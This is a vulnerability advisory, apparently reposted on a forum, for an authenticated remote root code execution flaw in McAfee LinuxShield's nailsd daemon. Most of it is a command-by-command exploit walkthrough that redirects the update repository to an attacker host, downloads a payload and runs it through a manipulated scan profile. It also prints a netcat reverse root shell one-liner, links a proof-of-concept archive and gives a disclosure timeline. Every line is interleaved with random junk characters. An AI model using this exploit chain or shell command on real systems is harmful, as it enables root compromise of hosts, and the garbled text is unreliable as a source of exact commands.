    5 L8 t( t* S8 I3 \) L
    LinuxShield uses a web-browser interface, and a large number of( u' {5 n6 A( d+ l7 e3 E
    LinuxShield installations can be centrally controlled by ePolicy
    1 T" E: J1 s" e3 Z+ |# W5 {, b4 C0 aOrchestrator.
    / R) ^% R* u, M: t; |8 H/ X; v# t( S; I2 C! M, e+ D, U
    (Product description from LinuxShield Product Guide)
    : o5 ~9 s4 C3 _+ V. Z# m2 I& o6 t+ \9 A: k8 A

    % g4 P- B+ `  d1 I  Z; O) t8 U
    2 @9 q+ v, }/ Q! IDescription:0 X4 K4 T" ]5 i
    ============
    + ~" [4 z* a- a, W/ G
    1 B) Y9 Y: o# _( h$ mThis vulnerability allows remote attackers to execute arbitrary code
    ' U' z( v" S! n: \on vulnerable installations of McAfee LinuxShield. User interaction
    , X1 N0 a' Y8 `is not required to exploit this vulnerability but an attacker must! j7 i; d( ]- K
    be authenticated.
    ( R5 j, z; U) I# r
    ! `8 O8 D% w# Z7 g4 JThe LinuxShield Webinterface communicates with the localy installed
    7 g& L9 y' ~) y5 {+ N"nailsd" daemon, which listens on port 65443/tcp, to do2 {; k) t# `4 v
    configuration
    & s% _& E- `( W) d6 x: cchanges, query the configuration and execute tasks.
    * m) E* U" j! ]% l4 s4 W* M9 N  d$ k
    Each user, which can login to the victim box, can also authenticate" A0 z6 w  e' d2 x
    it self to the "nailsd" and can do configuration changes and& @, o8 j6 ~7 \$ v7 A
    execute# m9 u6 x0 d. A0 o
    tasks with root privileges.0 v9 Z/ H. }# G8 B7 E% x& B
    8 D$ M" c8 b8 L6 X+ ?1 I
    A direct execution of commands is not possible, but it is possible to
    & g% z/ j$ \# T' Bdownload and execute code through manipulation of the config and
    % c# i7 p% P9 A; p; g& d3 F/ nexecute schedule tasks of the LinuxShield.' }( D( p/ f: Z

    5 Q+ f: q1 K' j9 d& _
    " a" M3 t! Z; S$ D! L5 pwalk-through (after the TLS handshake):4 w( D6 n% B/ C$ ]2 m
    +--------------------------------------8 d5 C9 O- o5 e
    / k! ~" F. S- v& F  b9 w% {
    nailsd > +OK welcome to the NAILS Statistics Service( A: b) a- i1 ?% v4 Y6 t3 ^+ z
    attacker> auth <user> <pass>
    9 b( x' f: {1 |$ ]5 Z. lnailsd > +OK successful authentication
    , _# M7 ~# m2 f: }* }, [& P# G7 O9 i' p+ D' ?+ \9 e+ R. h
    # Set the Attacker repository to download our code from a httpd7 M/ r" S* x" s4 v3 P& T) Y
    # (catalog.z)
    7 s  h0 u6 w, x; c8 |#---------------------------------------------------------------0 r( c% }: S' N
    attacker> db set 1 _table=repository status=1 siteList=<?xml version
    7 e/ Z  v/ |( `1 m+ V: O- K="1.0" encoding="UTF-8"?><ns:SiteLists
    3 P- c  ^5 y. K  t  `+ d% x+ Jxmlns:ns="naSiteLi
    * y6 W) i+ U0 r' m3 z% Tst" GlobalVersion="20030131003110"( K+ _3 S/ m" O1 h: r% i4 ]
    LocalVersion="200912091 f% [& w3 A/ K* v# m
    161903" Type="Client"><SiteList
    . ]. t0 H1 _" uDefault="1" Name="SomeGU$ \  P6 S# g, _
    ID"><HttpSite Type="repository"5 _/ J! |& D- o9 d* ^
    Name="EvilRepo" Order="1
    . K( C$ T. k. c" Server="<attackerhost>:80"2 `$ F9 A- F6 g8 f" x
    Enabled="1" Local="1"><Rela
    ; b3 b: a. o, \6 T* n- p# a6 {
    6 }# V- J/ X% ytivePath>nai</RelativePath><UseAuth>0</UseAuth><Use2 g4 X, s/ k- V+ x2 f: A; p
    rName></
    % P* P  p. ^$ {( z) i3 MUserName><Password) Y' G6 R# W  f: F
    Encrypted="0"/></HttpSite></SiteList></
    & `0 l' O1 ~  p! U8 \$ ^$ Zns:SiteLists> _cmd=update
    1 p2 M+ P. G$ o) I* Inailsd > +OK database changes buffered.
    ; k' b6 d0 ?' [2 z6 a, c6 F- S0 ], e4 V. K* X
    # Execute task to set the attacker repository: J% J. a5 r* l* u+ l. \
    #---------------------------------------------------------------
    8 Y1 W; i7 Q8 J* e4 pattacker> task setsitelist3 ^4 e) w0 @6 ^0 G
    nailsd > +OK setting sitelist from CMA.; G% Y, n% ~' D4 G4 P  K9 K% `

    8 P; b. n% }. ]3 S, V& n# Execute the default Update task to download the code
    : j. H5 h' p# w; T#---------------------------------------------------------------
    & H; ~1 X7 i; X% z' o7 g+ yattacker> task nstart LinuxShield Update
    9 W: z4 ^5 I; G* d, anailsd > +OK task LinuxShield Update starting6 u- u$ ^+ [- J2 G& Z

    * B. R3 D% b7 v* `: o# Create a Scan profile, which executes our code. The profiles are
    2 g9 D4 |# L+ H# W# not stored in the database.
    ' Q* T% O- j9 V( k5 j# Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    * }5 b0 R4 K4 o#---------------------------------------------------------------" }* ^9 d  v+ G- b4 l6 i. u
    attacker> sconf ODS_99 begin+ y4 v; x! i& C- h: r6 X
    nailsd > +OK 1260400888
    - n# O' n1 U8 t
    ' a5 C# y; j2 {9 v# Set the variable "nailsd.profile.ODS_99.scannerPath" to the( {% A! @# C* U& `9 f
    path- e3 C0 t  a1 Q- g' N
    # where our earlier downloaded catalog.z file is stored.9 |, ?8 i! t) [: q$ J6 C2 k" D
    # (/opt/McAfee/cma/scratch/update/catalog.z)4 i9 j) \3 _/ N" E6 F
    #---------------------------------------------------------------$ H1 t, ~* n& w2 g) c$ B1 \
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=- @/ K. C8 D- r  l
    true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O) _9 u% |7 X* @$ H4 P
    DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
    1 X5 M. K1 y. U0 a8 F+ c) j10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
      z2 l1 i; C4 ]: T* uine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro$ w( x$ S) k, {' j
    file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
    ; ~$ C8 z2 p7 J/ T+ tir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
    5 D" c% g* Z7 ?& Q. {. sginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
    & K  P8 `% d+ T, Q  r7 J7 I.profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu( N8 X1 G' v& u
    risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru7 K4 g6 W, q/ @5 J# ^: N
    e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99- n9 y% }" X0 M" @, }3 @: y, u
    .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi8 K) K1 s) _* i8 a
    le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil; B8 u8 h" J1 }
    dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
    4 h5 |5 S& o! `( ]9 ke nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr+ E7 g! z2 l+ @5 m$ O4 Z: C
    ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
    6 q1 C0 B! h1 ?" D8 Xo=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile. P& p+ \- [7 `/ s
    .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
    # A: h" z- }$ U9 g) brue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
    & v9 T0 ^+ Q* S3 V/ Gch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
    ' c- d* X! T8 C' y. R+ u0 ]) n00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.$ \2 X4 A; @) F- Q& F
    ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
    ) B& L$ E. C' u8 b. }ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true- c& u$ k0 F3 o- f
    nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr7 Z  J, @; G0 F
    ofile.ODS_99.filter.extensions.type=extension nailsd.profil' t4 P( N9 {7 s5 h, L. f' k$ C: i
    e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_996 U5 K6 d8 P+ V0 N$ p
    .action.Default.secondary=Quarantine nailsd.profile.ODS_99.1 _3 d/ X: d) K% v! h; _- u+ }& T
    action.App.primary=Clean nailsd.profile.ODS_99.action.App.s
    ! o. _# ?2 F: K. o2 n! g( @7 fecondary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa+ D: p) H( y( a; Y  f: n
    ss nailsd.profile.ODS_99.action.error=Block; V; R, u) I$ u3 w8 L7 ?& h5 `
    nailsd > +OK configuration changes buffered
    ' s7 _' R, u. `+ Uattacker> sconf ODS_99 commit 12604008883 j8 `% ]) w. x( \. ~
    nailsd > +OK configuration changes stored
    , q5 {# Y& f5 G, }
    5 ]* I- X" x0 _0 }/ b5 J5 W# Set a scan task with the manipulated profile to execute the code5 k! r) k4 H; z- o' a# W
    #---------------------------------------------------------------$ p* c1 L1 k  G: X) a! ]  @% j0 v6 @
    attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy) \2 ^& w8 s# V1 A
    pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
    , K  `0 t# G" b! n; Xmp;exclude:false timetable=type=unscheduled taskResults=0 i
    1 K9 g1 p; i0 v) y: x1 V1 t8 v_lastRun=1260318482 status=Stopped _cmd=insert
    ; o2 o6 ?* C% wnailsd > +OK database changes buffered" x! l, A8 e& {% R6 L+ ?: H5 _
    ) k/ Q: ?/ Y* H, F) I  ]  V
    # Execute scan task to execute the code
    - ~: P7 q- \. T4 S5 u) u#---------------------------------------------------------------1 g" Q4 P# @2 o: R  v' f# T# N
    attacker> task nstart Evil Task
    4 r( Q) u& B+ W: G& [
    6 Z9 j+ c6 J2 z) {% y8 }+-------------------------------------- walk-through EOF
    * f+ }6 @4 i% N: Q- `" Q% Z
    + O( t& P" W$ f' n/ b. C3 ?9 ]" [5 j) v" [& |/ n6 ^
    To get a reverse root shell place something like this in the catalog.z
    2 E0 ]2 K3 R& M7 f" }1 J! |# S0 N! ^% `% n
    --- snip ---
    ( h9 F5 |! H( \' _" ~#!/bin/sh$ N, ^0 |4 j4 I/ z' j$ R
    nc -nv <attacker_host> 4444 -e /bin/sh
    # k, i1 ~, I1 d' N2 ~--- /snip ---/ N# q) v1 U8 Z2 d

    , t- Q" w  Y& {; h7 e
    ; m' L* e+ h, p5 @2 }8 K# N- Z& \# c, g' q$ F
    Proof of Concept :
    - e7 \0 B7 t2 d; l0 ?' [# Y* b==================0 o+ w; g5 y2 n1 k
    ( s- B: g1 w1 V; o7 V
    http://inj3ct0r.com/sploits/11165.tar.gz
    ( |' g2 r& O. B) o- `6 n$ z
    % e; v1 K5 i( }& P( F0 J0 K/ h9 X' \
    * g5 ~& M) B9 V1 g
    0 D5 n7 V+ \2 m4 H8 }Solution:6 N2 y2 C7 j0 J. @6 x2 m
    =========2 \9 I( R# d& b5 o
    3 {+ m6 Y' e, ]) k  c' I# C
    McAfee Advisory
    ! F. C" h8 E& s5 S9 e1 W( M" ^( r+--------------
    ( Z) j2 F) b/ V& V$ t9 Dhttps://kc.mcafee.com/corporate/index?page=content&amp;id=SB10007
    % `, o1 y/ ~. g; t6 H" z( {
    & y$ A. Y) Y1 R7 l0 T" R2 X& l; n0 ~% m
    $ I: t0 P3 N4 X7 ?4 x8 I% a
    Disclosure Timeline (YYYY/MM/DD):4 i7 E& `3 x% \& q) A
    =================================& m1 p1 x: O$ n) [' }

    4 P2 i1 e# u9 W' X2009.12.07: Vulnerability found/ R* P! P: A1 r3 F2 P2 [9 u9 T6 z
    2010.02.03: Asked vendor for a PGP key/ U, k) _0 J' F
    2010.02.05: Vendor sent his PGP key
    8 V5 h; `7 e0 |! B! J" c6 \2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure1 [4 A( Z; ^" v7 |2 ]% n6 r
    date (2010.02.18) to Vendor. E$ F: }7 L- V6 [* P
    2010.02.05: Vendor acknowledges the reception of the advisory/ H% d* Y, U; G+ W+ B$ Y
    2010.02.16: Ask for a status update, because the planned release date is
    9 m1 i- O3 \+ V) c; E0 \2010.02.18.
    # X- v2 {% P' ?  Z+ n$ N2010.02.16: Vendor response that, they are currently working on a patch
    ) N. n" |! l. f% z+ H3 `, P9 s2010.02.17: Changed release date to 2010.02.25.
    1 `7 R* x9 }# ^6 K  O2010.02.22: Vendor gives a status update, that they are able to release
    ! Z+ L' r  U6 x# Othe patch on 2010.02.25./ a- p) P# j8 A4 X  ~! ^6 X& \
    2010.02.24: Ask for a list of affected products and the advisory url.1 c  P3 x0 ~, g/ h+ L9 g6 |5 L. t( b
    2010.02.24: Vendor sends the list.
    5 {7 W! f5 q5 m2 f+ X' U" R: g+ G2010.03.02: Release of this Advisory+ x) O6 f& Y" r/ ~' l# t" t

    . Y9 }/ ?% ?1 g# Y& L* l+ g9 V( E" {; a

    ! t, z4 W0 e/ K4 L/ t# g* d# W

    # N$ A9 E+ _  N- \8 g  d. G- Z! M4 D
    2 r( b& i4 X: j$ N+ `) m" r1 c, }0 B" K) O4 C

    & C3 G. M3 h2 ?2 x
    % v- U. R& X5 O/ U/ v( \
    + v% ~' o) Q( b+ z$ ^9 m4 E/ g
    - l* i3 \; i1 r: s7 V+ _: }& z6 R9 D9 P7 a% K3 |- w

    : W7 a. o8 F, A4 ?" ?5 e) G
    1 z. m# N' g$ G/ w# h. X. e! i9 j8 h$ u
    3 P* F' B& R! u+ M; W6 a

    ( \! ~0 [0 o, C( p2 W9 H( U3 R  N. u

    # L! s/ ^7 Y: ?0 ^8 Q4 F$ R8 y( T- P, z& i' w7 d- k% r1 q7 s5 {
    ) `) Q6 q* L. }  G3 `
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表